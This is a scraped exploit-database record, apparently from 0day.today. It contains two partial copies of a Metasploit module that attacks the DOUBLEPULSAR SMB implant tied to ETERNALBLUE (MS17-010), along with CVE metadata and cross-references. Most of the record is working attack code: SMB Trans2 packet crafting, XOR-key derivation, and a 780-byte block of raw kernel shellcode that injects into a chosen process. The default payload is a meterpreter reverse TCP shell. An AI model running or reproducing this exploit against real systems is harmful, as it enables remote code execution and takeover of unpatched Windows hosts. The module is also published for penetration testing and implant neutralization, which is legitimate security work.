to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-02] #"}, "lastseen": "2021-11-01T22:21:46", "differentElements": ["sourceData"], "edition": 63}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "ca5f767bfddf033d21774271f0a2bf45", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-02T22:13:12", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": 
["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-02T22:13:12", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-11-02T22:13:12", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: 
https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => 
MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n 